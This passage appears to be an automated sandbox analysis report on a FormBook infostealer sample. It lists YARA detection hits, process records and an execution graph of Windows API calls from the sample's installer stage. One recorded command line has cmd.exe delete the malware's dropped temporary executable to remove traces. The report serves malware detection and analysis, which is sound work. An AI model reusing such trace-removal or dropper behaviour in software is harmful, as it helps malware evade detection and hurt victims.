                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.572527306.0000000000350000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.572527306.0000000000350000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.572527306.0000000000350000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.572527306.0000000000350000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.572527306.0000000000350000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.572610392.00000000007C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.572610392.00000000007C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.572610392.00000000007C0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.572610392.00000000007C0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.572610392.00000000007C0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.572645078.00000000007F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.572645078.00000000007F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.572645078.00000000007F0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.572645078.00000000007F0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.572645078.00000000007F0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                          Reputation:high

                          General

                          Target ID:5
                          Start time:07:25:40
                          Start date:14/03/2023
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):true
                          Commandline:/c del "C:\Users\user\AppData\Local\Temp\afhjjq.exe"
                          Imagebase:0x11d0000
                          File size:232960 bytes
                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high

                          General

                          Target ID:6
                          Start time:07:25:40
                          Start date:14/03/2023
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7fcd70000
                          File size:625664 bytes
                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Disassembly

                          Reset < >

                            Execution Graph

                            Execution Coverage:15.9%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:16.4%
                            Total number of Nodes:1385
                            Total number of Limit Nodes:25
                            execution_graph 3224 403640 SetErrorMode GetVersionExW 3225 403692 GetVersionExW 3224->3225 3226 4036ca 3224->3226 3225->3226 3227 403723 3226->3227 3228 406a35 5 API calls 3226->3228 3314 4069c5 GetSystemDirectoryW 3227->3314 3228->3227 3230 403739 lstrlenA 3230->3227 3231 403749 3230->3231 3317 406a35 GetModuleHandleA 3231->3317 3234 406a35 5 API calls 3235 403757 3234->3235 3236 406a35 5 API calls 3235->3236 3237 403763 #17 OleInitialize SHGetFileInfoW 3236->3237 3323 406668 lstrcpynW 3237->3323 3240 4037b0 GetCommandLineW 3324 406668 lstrcpynW 3240->3324 3242 4037c2 3325 405f64 3242->3325 3245 4038f7 3246 40390b GetTempPathW 3245->3246 3329 40360f 3246->3329 3248 403923 3250 403927 GetWindowsDirectoryW lstrcatW 3248->3250 3251 40397d DeleteFileW 3248->3251 3249 405f64 CharNextW 3253 4037f9 3249->3253 3254 40360f 12 API calls 3250->3254 3339 4030d0 GetTickCount GetModuleFileNameW 3251->3339 3253->3245 3253->3249 3258 4038f9 3253->3258 3256 403943 3254->3256 3255 403990 3259 403b6c ExitProcess OleUninitialize 3255->3259 3261 403a45 3255->3261 3268 405f64 CharNextW 3255->3268 3256->3251 3257 403947 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3256->3257 3260 40360f 12 API calls 3257->3260 3425 406668 lstrcpynW 3258->3425 3263 403b91 3259->3263 3264 403b7c 3259->3264 3267 403975 3260->3267 3369 403d17 3261->3369 3265 403b99 GetCurrentProcess OpenProcessToken 3263->3265 3266 403c0f ExitProcess 3263->3266 3479 405cc8 3264->3479 3271 403bb0 LookupPrivilegeValueW AdjustTokenPrivileges 3265->3271 3272 403bdf 3265->3272 3267->3251 3267->3259 3283 4039b2 3268->3283 3271->3272 3276 406a35 5 API calls 3272->3276 3273 403a54 3273->3259 3279 403be6 3276->3279 3277 403a1b 3426 40603f 3277->3426 3278 403a5c 3442 405c33 3278->3442 3281 403bfb ExitWindowsEx 3279->3281 3285 403c08 3279->3285 3281->3266 3281->3285 3283->3277 3283->3278 3483 40140b 3285->3483 3288 403a72 lstrcatW 3289 403a7d lstrcatW lstrcmpiW 3288->3289 3289->3273 3290 403a9d 3289->3290 3292 403aa2 3290->3292 3293 403aa9 3290->3293 3445 405b99 CreateDirectoryW 3292->3445 3450 405c16 CreateDirectoryW 3293->3450 3294 403a3a 3441 406668 lstrcpynW 3294->3441 3299 403aae SetCurrentDirectoryW 3300 403ac0 3299->3300 3301 403acb 3299->3301 3453 406668 lstrcpynW 3300->3453 3454 406668 lstrcpynW 3301->3454 3306 403b19 CopyFileW 3310 403ad8 3306->3310 3307 403b63 3309 406428 36 API calls 3307->3309 3309->3273 3310->3307 3311 4066a5 17 API calls 3310->3311 3313 403b4d CloseHandle 3310->3313 3455 4066a5 3310->3455 3472 406428 MoveFileExW 3310->3472 3476 405c4b CreateProcessW 3310->3476 3311->3310 3313->3310 3315 4069e7 wsprintfW LoadLibraryExW 3314->3315 3315->3230 3318 406a51 3317->3318 3319 406a5b GetProcAddress 3317->3319 3320 4069c5 3 API calls 3318->3320 3321 403750 3319->3321 3322 406a57 3320->3322 3321->3234 3322->3319 3322->3321 3323->3240 3324->3242 3326 405f6a 3325->3326 3327 4037e8 CharNextW 3326->3327 3328 405f71 CharNextW 3326->3328 3327->3253 3328->3326 3486 4068ef 3329->3486 3331 403625 3331->3248 3332 40361b 3332->3331 3495 405f37 lstrlenW CharPrevW 3332->3495 3335 405c16 2 API calls 3336 403633 3335->3336 3498 406187 3336->3498 3502 406158 GetFileAttributesW CreateFileW 3339->3502 3341 403113 3368 403120 3341->3368 3503 406668 lstrcpynW 3341->3503 3343 403136 3504 405f83 lstrlenW 3343->3504 3347 403147 GetFileSize 3348 403241 3347->3348 3367 40315e 3347->3367 3509 40302e 3348->3509 3352 403286 GlobalAlloc 3355 40329d 3352->3355 3354 4032de 3356 40302e 32 API calls 3354->3356 3359 406187 2 API calls 3355->3359 3356->3368 3357 403267 3358 4035e2 ReadFile 3357->3358 3360 403272 3358->3360 3362 4032ae CreateFileW 3359->3362 3360->3352 3360->3368 3361 40302e 32 API calls 3361->3367 3363 4032e8 3362->3363 3362->3368 3524 4035f8 SetFilePointer 3363->3524 3365 4032f6 3525 403371 3365->3525 3367->3348 3367->3354 3367->3361 3367->3368 3540 4035e2 3367->3540 3368->3255 3370 406a35 5 API calls 3369->3370 3371 403d2b 3370->3371 3372 403d31 3371->3372 3373 403d43 3371->3373 3595 4065af wsprintfW 3372->3595 3596 406536 3373->3596 3377 403d92 lstrcatW 3378 403d41 3377->3378 3587 403fed 3378->3587 3379 406536 3 API calls 3379->3377 3382 40603f 18 API calls 3383 403dc4 3382->3383 3384 403e58 3383->3384 3386 406536 3 API calls 3383->3386 3385 40603f 18 API calls 3384->3385 3387 403e5e 3385->3387 3393 403df6 3386->3393 3388 403e6e LoadImageW 3387->3388 3389 4066a5 17 API calls 3387->3389 3390 403f14 3388->3390 3391 403e95 RegisterClassW 3388->3391 3389->3388 3395 40140b 2 API calls 3390->3395 3394 403ecb SystemParametersInfoW CreateWindowExW 3391->3394 3424 403f1e 3391->3424 3392 403e17 lstrlenW 3397 403e25 lstrcmpiW 3392->3397 3398 403e4b 3392->3398 3393->3384 3393->3392 3396 405f64 CharNextW 3393->3396 3394->3390 3399 403f1a 3395->3399 3400 403e14 3396->3400 3397->3398 3401 403e35 GetFileAttributesW 3397->3401 3402 405f37 3 API calls 3398->3402 3404 403fed 18 API calls 3399->3404 3399->3424 3400->3392 3403 403e41 3401->3403 3405 403e51 3402->3405 3403->3398 3406 405f83 2 API calls 3403->3406 3407 403f2b 3404->3407 3601 406668 lstrcpynW 3405->3601 3406->3398 3409 403f37 ShowWindow 3407->3409 3410 403fba 3407->3410 3411 4069c5 3 API calls 3409->3411 3602 40579d OleInitialize 3410->3602 3413 403f4f 3411->3413 3415 403f5d GetClassInfoW 3413->3415 3418 4069c5 3 API calls 3413->3418 3414 403fc0 3416 403fc4 3414->3416 3417 403fdc 3414->3417 3420 403f71 GetClassInfoW RegisterClassW 3415->3420 3421 403f87 DialogBoxParamW 3415->3421 3422 40140b 2 API calls 3416->3422 3416->3424 3419 40140b 2 API calls 3417->3419 3418->3415 3419->3424 3420->3421 3423 40140b 2 API calls 3421->3423 3422->3424 3423->3424 3424->3273 3425->3246 3624 406668 lstrcpynW 3426->3624 3428 406050 3625 405fe2 CharNextW CharNextW 3428->3625 3431 403a27 3431->3259 3440 406668 lstrcpynW 3431->3440 3432 4068ef 5 API calls 3438 406066 3432->3438 3433 406097 lstrlenW 3434 4060a2 3433->3434 3433->3438 3435 405f37 3 API calls 3434->3435 3437 4060a7 GetFileAttributesW 3435->3437 3437->3431 3438->3431 3438->3433 3439 405f83 2 API calls 3438->3439 3631 40699e FindFirstFileW 3438->3631 3439->3433 3440->3294 3441->3261 3443 406a35 5 API calls 3442->3443 3444 403a61 lstrcatW 3443->3444 3444->3288 3444->3289 3446 403aa7 3445->3446 3447 405bea GetLastError 3445->3447 3446->3299 3447->3446 3448 405bf9 SetFileSecurityW 3447->3448 3448->3446 3449 405c0f GetLastError 3448->3449 3449->3446 3451 405c2a GetLastError 3450->3451 3452 405c26 3450->3452 3451->3452 3452->3299 3453->3301 3454->3310 3459 4066b2 3455->3459 3456 4068d5 3457 403b0d DeleteFileW 3456->3457 3636 406668 lstrcpynW 3456->3636 3457->3306 3457->3310 3459->3456 3460 4068a3 lstrlenW 3459->3460 3461 4067ba GetSystemDirectoryW 3459->3461 3464 406536 3 API calls 3459->3464 3465 4066a5 10 API calls 3459->3465 3466 4067cd GetWindowsDirectoryW 3459->3466 3467 406844 lstrcatW 3459->3467 3468 4066a5 10 API calls 3459->3468 3469 4068ef 5 API calls 3459->3469 3470 4067fc SHGetSpecialFolderLocation 3459->3470 3634 4065af wsprintfW 3459->3634 3635 406668 lstrcpynW 3459->3635 3460->3459 3461->3459 3464->3459 3465->3460 3466->3459 3467->3459 3468->3459 3469->3459 3470->3459 3471 406814 SHGetPathFromIDListW CoTaskMemFree 3470->3471 3471->3459 3473 406449 3472->3473 3474 40643c 3472->3474 3473->3310 3637 4062ae 3474->3637 3477 405c8a 3476->3477 3478 405c7e CloseHandle 3476->3478 3477->3310 3478->3477 3482 405cdd 3479->3482 3480 403b89 ExitProcess 3481 405cf1 MessageBoxIndirectW 3481->3480 3482->3480 3482->3481 3484 401389 2 API calls 3483->3484 3485 401420 3484->3485 3485->3266 3487 4068fc 3486->3487 3489 406972 3487->3489 3490 406965 CharNextW 3487->3490 3492 405f64 CharNextW 3487->3492 3493 406951 CharNextW 3487->3493 3494 406960 CharNextW 3487->3494 3488 406977 CharPrevW 3488->3489 3489->3488 3491 406998 3489->3491 3490->3487 3490->3489 3491->3332 3492->3487 3493->3487 3494->3490 3496 405f53 lstrcatW 3495->3496 3497 40362d 3495->3497 3496->3497 3497->3335 3499 406194 GetTickCount GetTempFileNameW 3498->3499 3500 40363e 3499->3500 3501 4061ca 3499->3501 3500->3248 3501->3499 3501->3500 3502->3341 3503->3343 3505 405f91 3504->3505 3506 40313c 3505->3506 3507 405f97 CharPrevW 3505->3507 3508 406668 lstrcpynW 3506->3508 3507->3505 3507->3506 3508->3347 3510 403057 3509->3510 3511 40303f 3509->3511 3513 403067 GetTickCount 3510->3513 3514 40305f 3510->3514 3512 403048 DestroyWindow 3511->3512 3517 40304f 3511->3517 3512->3517 3516 403075 3513->3516 3513->3517 3544 406a71 3514->3544 3518 4030aa CreateDialogParamW ShowWindow 3516->3518 3519 40307d 3516->3519 3517->3352 3517->3368 3543 4035f8 SetFilePointer 3517->3543 3518->3517 3519->3517 3548 403012 3519->3548 3521 40308b wsprintfW 3551 4056ca 3521->3551 3524->3365 3526 403380 SetFilePointer 3525->3526 3527 40339c 3525->3527 3526->3527 3562 403479 GetTickCount 3527->3562 3532 403479 42 API calls 3533 4033d3 3532->3533 3534 40343f ReadFile 3533->3534 3538 4033e2 3533->3538 3539 403439 3533->3539 3534->3539 3536 4061db ReadFile 3536->3538 3538->3536 3538->3539 3577 40620a WriteFile 3538->3577 3539->3368 3541 4061db ReadFile 3540->3541 3542 4035f5 3541->3542 3542->3367 3543->3357 3545 406a8e PeekMessageW 3544->3545 3546 406a84 DispatchMessageW 3545->3546 3547 406a9e 3545->3547 3546->3545 3547->3517 3549 403021 3548->3549 3550 403023 MulDiv 3548->3550 3549->3550 3550->3521 3552 4056e5 3551->3552 3553 4030a8 3551->3553 3554 405701 lstrlenW 3552->3554 3555 4066a5 17 API calls 3552->3555 3553->3517 3556 40572a 3554->3556 3557 40570f lstrlenW 3554->3557 3555->3554 3558 405730 SetWindowTextW 3556->3558 3559 40573d 3556->3559 3557->3553 3560 405721 lstrcatW 3557->3560 3558->3559 3559->3553 3561 405743 SendMessageW SendMessageW SendMessageW 3559->3561 3560->3556 3561->3553 3563 4035d1 3562->3563 3564 4034a7 3562->3564 3565 40302e 32 API calls 3563->3565 3579 4035f8 SetFilePointer 3564->3579 3572 4033a3 3565->3572 3567 4034b2 SetFilePointer 3571 4034d7 3567->3571 3568 4035e2 ReadFile 3568->3571 3570 40302e 32 API calls 3570->3571 3571->3568 3571->3570 3571->3572 3573 40620a WriteFile 3571->3573 3574 4035b2 SetFilePointer 3571->3574 3580 406bb0 3571->3580 3572->3539 3575 4061db ReadFile 3572->3575 3573->3571 3574->3563 3576 4033bc 3575->3576 3576->3532 3576->3539 3578 406228 3577->3578 3578->3538 3579->3567 3581 406bd5 3580->3581 3582 406bdd 3580->3582 3581->3571 3582->3581 3583 406c64 GlobalFree 3582->3583 3584 406c6d GlobalAlloc 3582->3584 3585 406ce4 GlobalAlloc 3582->3585 3586 406cdb GlobalFree 3582->3586 3583->3584 3584->3581 3584->3582 3585->3581 3585->3582 3586->3585 3588 404001 3587->3588 3609 4065af wsprintfW 3588->3609 3590 404072 3610 4040a6 3590->3610 3592 403da2 3592->3382 3593 404077 3593->3592 3594 4066a5 17 API calls 3593->3594 3594->3593 3595->3378 3613 4064d5 3596->3613 3599 403d73 3599->3377 3599->3379 3600 40656a RegQueryValueExW RegCloseKey 3600->3599 3601->3384 3617 404610 3602->3617 3604 4057e7 3605 404610 SendMessageW 3604->3605 3607 4057f9 OleUninitialize 3605->3607 3606 4057c0 3606->3604 3620 401389 3606->3620 3607->3414 3609->3590 3611 4066a5 17 API calls 3610->3611 3612 4040b4 SetWindowTextW 3611->3612 3612->3593 3614 4064e4 3613->3614 3615 4064e8 3614->3615 3616 4064ed RegOpenKeyExW 3614->3616 3615->3599 3615->3600 3616->3615 3618 404628 3617->3618 3619 404619 SendMessageW 3617->3619 3618->3606 3619->3618 3622 401390 3620->3622 3621 4013fe 3621->3606 3622->3621 3623 4013cb MulDiv SendMessageW 3622->3623 3623->3622 3624->3428 3626 405fff 3625->3626 3628 406011 3625->3628 3627 40600c CharNextW 3626->3627 3626->3628 3630 406035 3627->3630 3629 405f64 CharNextW 3628->3629 3628->3630 3629->3628 3630->3431 3630->3432 3632 4069b4 FindClose 3631->3632 3633 4069bf 3631->3633 3632->3633 3633->3438 3634->3459 3635->3459 3636->3457 3638 406304 GetShortPathNameW 3637->3638 3639 4062de 3637->3639 3640 406423 3638->3640 3641 406319 3638->3641 3664 406158 GetFileAttributesW CreateFileW 3639->3664 3640->3473 3641->3640 3643 406321 wsprintfA 3641->3643 3645 4066a5 17 API calls 3643->3645 3644 4062e8 CloseHandle GetShortPathNameW 3644->3640 3646 4062fc 3644->3646 3647 406349 3645->3647 3646->3638 3646->3640 3665 406158 GetFileAttributesW CreateFileW 3647->3665 3649 406356 3649->3640 3650 406365 GetFileSize GlobalAlloc 3649->3650 3651 406387 3650->3651 3652 40641c CloseHandle 3650->3652 3653 4061db ReadFile 3651->3653 3652->3640 3654 40638f 3653->3654 3654->3652 3666 4060bd lstrlenA 3654->3666 3657 4063a6 lstrcpyA 3660 4063c8 3657->3660 3658 4063ba 3659 4060bd 4 API calls 3658->3659 3659->3660 3661 4063ff SetFilePointer 3660->3661 3662 40620a WriteFile 3661->3662 3663 406415 GlobalFree 3662->3663 3663->3652 3664->3644 3665->3649 3667 4060fe lstrlenA 3666->3667 3668 406106 3667->3668 3669 4060d7 lstrcmpiA 3667->3669 3668->3657 3668->3658 3669->3668 3670 4060f5 CharNextA 3669->3670 3670->3667 3671 401941 3672 401943 3671->3672 3677 402da6 3672->3677 3678 402db2 3677->3678 3679 4066a5 17 API calls 3678->3679 3680 402dd3 3679->3680 3681 401948 3680->3681 3682 4068ef 5 API calls 3680->3682 3683 405d74 3681->3683 3682->3681 3684 40603f 18 API calls 3683->3684 3685 405d94 3684->3685 3686 405d9c DeleteFileW 3685->3686 3687 405db3 3685->3687 3691 401951 3686->3691 3688 405ed3 3687->3688 3719 406668 lstrcpynW 3687->3719 3688->3691 3695 40699e 2 API calls 3688->3695 3690 405dd9 3692 405dec 3690->3692 3693 405ddf lstrcatW 3690->3693 3694 405f83 2 API calls 3692->3694 3696 405df2 3693->3696 3694->3696 3698 405ef8 3695->3698 3697 405e02 lstrcatW 3696->3697 3699 405e0d lstrlenW FindFirstFileW 3696->3699 3697->3699 3698->3691 3700 405f37 3 API calls 3698->3700 3699->3688 3717 405e2f 3699->3717 3701 405f02 3700->3701 3703 405d2c 5 API calls 3701->3703 3702 405eb6 FindNextFileW 3706 405ecc FindClose 3702->3706 3702->3717 3705 405f0e 3703->3705 3707 405f12 3705->3707 3708 405f28 3705->3708 3706->3688 3707->3691 3711 4056ca 24 API calls 3707->3711 3710 4056ca 24 API calls 3708->3710 3710->3691 3713 405f1f 3711->3713 3712 405d74 60 API calls 3712->3717 3715 406428 36 API calls 3713->3715 3714 4056ca 24 API calls 3714->3702 3715->3691 3716 4056ca 24 API calls 3716->3717 3717->3702 3717->3712 3717->3714 3717->3716 3718 406428 36 API calls 3717->3718 3720 406668 lstrcpynW 3717->3720 3721 405d2c 3717->3721 3718->3717 3719->3690 3720->3717 3729 406133 GetFileAttributesW 3721->3729 3724 405d47 RemoveDirectoryW 3727 405d55 3724->3727 3725 405d4f DeleteFileW 3725->3727 3726 405d59 3726->3717 3727->3726 3728 405d65 SetFileAttributesW 3727->3728 3728->3726 3730 405d38 3729->3730 3731 406145 SetFileAttributesW 3729->3731 3730->3724 3730->3725 3730->3726 3731->3730 3732 4015c1 3733 402da6 17 API calls 3732->3733 3734 4015c8 3733->3734 3735 405fe2 4 API calls 3734->3735 3747 4015d1 3735->3747 3736 401631 3737 401663 3736->3737 3738 401636 3736->3738 3742 401423 24 API calls 3737->3742 3751 401423 3738->3751 3739 405f64 CharNextW 3739->3747 3748 40165b 3742->3748 3744 405c16 2 API calls 3744->3747 3745 405c33 5 API calls 3745->3747 3746 40164a SetCurrentDirectoryW 3746->3748 3747->3736 3747->3739 3747->3744 3747->3745 3749 401617 GetFileAttributesW 3747->3749 3750 405b99 4 API calls 3747->3750 3749->3747 3750->3747 3752 4056ca 24 API calls 3751->3752 3753 401431 3752->3753 3754 406668 lstrcpynW 3753->3754 3754->3746 3935 401c43 3957 402d84 3935->3957 3937 401c4a 3938 402d84 17 API calls 3937->3938 3939 401c57 3938->3939 3940 402da6 17 API calls 3939->3940 3941 401c6c 3939->3941 3940->3941 3942 401c7c 3941->3942 3943 402da6 17 API calls 3941->3943 3944 401cd3 3942->3944 3945 401c87 3942->3945 3943->3942 3947 402da6 17 API calls 3944->3947 3946 402d84 17 API calls 3945->3946 3949 401c8c 3946->3949 3948 401cd8 3947->3948 3950 402da6 17 API calls 3948->3950 3951 402d84 17 API calls 3949->3951 3952 401ce1 FindWindowExW 3950->3952 3953 401c98 3951->3953 3956 401d03 3952->3956 3954 401cc3 SendMessageW 3953->3954 3955 401ca5 SendMessageTimeoutW 3953->3955 3954->3956 3955->3956 3958 4066a5 17 API calls 3957->3958 3959 402d99 3958->3959 3959->3937 3967 4028c4 3968 4028ca 3967->3968 3969 4028d2 FindClose 3968->3969 3970 402c2a 3968->3970 3969->3970 3776 4040c5 3777 4040dd 3776->3777 3778 40423e 3776->3778 3777->3778 3779 4040e9 3777->3779 3780 40424f GetDlgItem GetDlgItem 3778->3780 3785 40428f 3778->3785 3782 4040f4 SetWindowPos 3779->3782 3783 404107 3779->3783 3852 4045c4 3780->3852 3781 4042e9 3786 404610 SendMessageW 3781->3786 3794 404239 3781->3794 3782->3783 3787 404110 ShowWindow 3783->3787 3788 404152 3783->3788 3785->3781 3793 401389 2 API calls 3785->3793 3817 4042fb 3786->3817 3795 404130 GetWindowLongW 3787->3795 3796 40422b 3787->3796 3790 404171 3788->3790 3791 40415a DestroyWindow 3788->3791 3789 404279 KiUserCallbackDispatcher 3792 40140b 2 API calls 3789->3792 3798 404176 SetWindowLongW 3790->3798 3799 404187 3790->3799 3797 40456e 3791->3797 3792->3785 3800 4042c1 3793->3800 3795->3796 3802 404149 ShowWindow 3795->3802 3858 40462b 3796->3858 3797->3794 3809 40457e ShowWindow 3797->3809 3798->3794 3799->3796 3803 404193 GetDlgItem 3799->3803 3800->3781 3804 4042c5 SendMessageW 3800->3804 3802->3788 3807 4041c1 3803->3807 3808 4041a4 SendMessageW IsWindowEnabled 3803->3808 3804->3794 3805 40140b 2 API calls 3805->3817 3806 40454f DestroyWindow EndDialog 3806->3797 3811 4041ce 3807->3811 3814 404215 SendMessageW 3807->3814 3815 4041e1 3807->3815 3823 4041c6 3807->3823 3808->3794 3808->3807 3809->3794 3810 4066a5 17 API calls 3810->3817 3811->3814 3811->3823 3813 4045c4 18 API calls 3813->3817 3814->3796 3818 4041e9 3815->3818 3819 4041fe 3815->3819 3816 4041fc 3816->3796 3817->3805 3817->3806 3817->3810 3817->3813 3824 4045c4 18 API calls 3817->3824 3821 40140b 2 API calls 3818->3821 3820 40140b 2 API calls 3819->3820 3822 404205 3820->3822 3821->3823 3822->3796 3822->3823 3855 40459d 3823->3855 3825 404376 GetDlgItem 3824->3825 3826 404393 ShowWindow EnableWindow 3825->3826 3827 40438b 3825->3827 3872 4045e6 EnableWindow 3826->3872 3827->3826 3829 4043bd EnableWindow 3834 4043d1 3829->3834 3830 4043d6 GetSystemMenu EnableMenuItem SendMessageW 3831 404406 SendMessageW 3830->3831 3830->3834 3831->3834 3833 4040a6 18 API calls 3833->3834 3834->3830 3834->3833 3873 4045f9 SendMessageW 3834->3873 3874 406668 lstrcpynW 3834->3874 3836 404435 lstrlenW 3837 4066a5 17 API calls 3836->3837 3838 40444b SetWindowTextW 3837->3838 3839 401389 2 API calls 3838->3839 3840 40445c 3839->3840 3840->3794 3840->3817 3841 40448f DestroyWindow 3840->3841 3843 40448a 3840->3843 3841->3797 3842 4044a9 CreateDialogParamW 3841->3842 3842->3797 3844 4044dc 3842->3844 3843->3794 3845 4045c4 18 API calls 3844->3845 3846 4044e7 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3845->3846 3847 401389 2 API calls 3846->3847 3848 40452d 3847->3848 3848->3794 3849 404535 ShowWindow 3848->3849 3850 404610 SendMessageW 3849->3850 3851 40454d 3850->3851 3851->3797 3853 4066a5 17 API calls 3852->3853 3854 4045cf SetDlgItemTextW 3853->3854 3854->3789 3856 4045a4 3855->3856 3857 4045aa SendMessageW 3855->3857 3856->3857 3857->3816 3859 4046ee 3858->3859 3860 404643 GetWindowLongW 3858->3860 3859->3794 3860->3859 3861 404658 3860->3861 3861->3859 3862 404685 GetSysColor 3861->3862 3863 404688 3861->3863 3862->3863 3864 404698 SetBkMode 3863->3864 3865 40468e SetTextColor 3863->3865 3866 4046b0 GetSysColor 3864->3866 3867 4046b6 3864->3867 3865->3864 3866->3867 3868 4046c7 3867->3868 3869 4046bd SetBkColor 3867->3869 3868->3859 3870 4046e1 CreateBrushIndirect 3868->3870 3871 4046da DeleteObject 3868->3871 3869->3868 3870->3859 3871->3870 3872->3829 3873->3834 3874->3836 3974 4016cc 3975 402da6 17 API calls 3974->3975 3976 4016d2 GetFullPathNameW 3975->3976 3977 4016ec 3976->3977 3983 40170e 3976->3983 3979 40699e 2 API calls 3977->3979 3977->3983 3978 401723 GetShortPathNameW 3980 402c2a 3978->3980 3981 4016fe 3979->3981 3981->3983 3984 406668 lstrcpynW 3981->3984 3983->3978 3983->3980 3984->3983 3985 401e4e GetDC 3986 402d84 17 API calls 3985->3986 3987 401e60 GetDeviceCaps MulDiv ReleaseDC 3986->3987 3988 402d84 17 API calls 3987->3988 3989 401e91 3988->3989 3990 4066a5 17 API calls 3989->3990 3991 401ece CreateFontIndirectW 3990->3991 3992 402638 3991->3992 3992->3992 3993 402950 3994 402da6 17 API calls 3993->3994 3996 40295c 3994->3996 3995 402972 3998 406133 2 API calls 3995->3998 3996->3995 3997 402da6 17 API calls 3996->3997 3997->3995 3999 402978 3998->3999 4021 406158 GetFileAttributesW CreateFileW 3999->4021 4001 402985 4002 402a3b 4001->4002 4003 4029a0 GlobalAlloc 4001->4003 4004 402a23 4001->4004 4005 402a42 DeleteFileW 4002->4005 4006 402a55 4002->4006 4003->4004 4007 4029b9 4003->4007 4008 403371 44 API calls 4004->4008 4005->4006 4022 4035f8 SetFilePointer 4007->4022 4010 402a30 CloseHandle 4008->4010 4010->4002 4011 4029bf 4012 4035e2 ReadFile 4011->4012 4013 4029c8 GlobalAlloc 4012->4013 4014 4029d8 4013->4014 4015 402a0c 4013->4015 4016 403371 44 API calls 4014->4016 4017 40620a WriteFile 4015->4017 4020 4029e5 4016->4020 4018 402a18 GlobalFree 4017->4018 4018->4004 4019 402a03 GlobalFree 4019->4015 4020->4019 4021->4001 4022->4011 4030 403cd5 4031 403ce0 4030->4031 4032 403ce4 4031->4032 4033 403ce7 GlobalAlloc 4031->4033 4033->4032 4034 401956 4035 402da6 17 API calls 4034->4035 4036 40195d lstrlenW 4035->4036 4037 402638 4036->4037 4038 4014d7 4039 402d84 17 API calls 4038->4039 4040 4014dd Sleep 4039->4040 4042 402c2a 4040->4042 4043 4020d8 4044 4020ea 4043->4044 4054 40219c 4043->4054 4045 402da6 17 API calls 4044->4045 4046 4020f1 4045->4046 4048 402da6 17 API calls 4046->4048 4047 401423 24 API calls 4050 4022f6 4047->4050 4049 4020fa 4048->4049 4051 402110 LoadLibraryExW 4049->4051 4052 402102 GetModuleHandleW 4049->4052 4053 402121 4051->4053 4051->4054 4052->4051 4052->4053 4063 406aa4 4053->4063 4054->4047 4057 402132 4060 401423 24 API calls 4057->4060 4061 402142 4057->4061 4058 40216b 4059 4056ca 24 API calls 4058->4059 4059->4061 4060->4061 4061->4050 4062 40218e FreeLibrary 4061->4062 4062->4050 4068 40668a WideCharToMultiByte 4063->4068 4065 406ac1 4066 406ac8 GetProcAddress 4065->4066 4067 40212c 4065->4067 4066->4067 4067->4057 4067->4058 4068->4065 4069 402b59 4070 402b60 4069->4070 4071 402bab 4069->4071 4073 402ba9 4070->4073 4075 402d84 17 API calls 4070->4075 4072 406a35 5 API calls 4071->4072 4074 402bb2 4072->4074 4076 402da6 17 API calls 4074->4076 4077 402b6e 4075->4077 4078 402bbb 4076->4078 4079 402d84 17 API calls 4077->4079 4078->4073 4080 402bbf IIDFromString 4078->4080 4082 402b7a 4079->4082 4080->4073 4081 402bce 4080->4081 4081->4073 4087 406668 lstrcpynW 4081->4087 4086 4065af wsprintfW 4082->4086 4085 402beb CoTaskMemFree 4085->4073 4086->4073 4087->4085 4088 402a5b 4089 402d84 17 API calls 4088->4089 4090 402a61 4089->4090 4091 402aa4 4090->4091 4092 402a88 4090->4092 4097 40292e 4090->4097 4094 402abe 4091->4094 4095 402aae 4091->4095 4093 402a8d 4092->4093 4101 402a9e 4092->4101 4102 406668 lstrcpynW 4093->4102 4096 4066a5 17 API calls 4094->4096 4098 402d84 17 API calls 4095->4098 4096->4101 4098->4101 4101->4097 4103 4065af wsprintfW 4101->4103 4102->4097 4103->4097 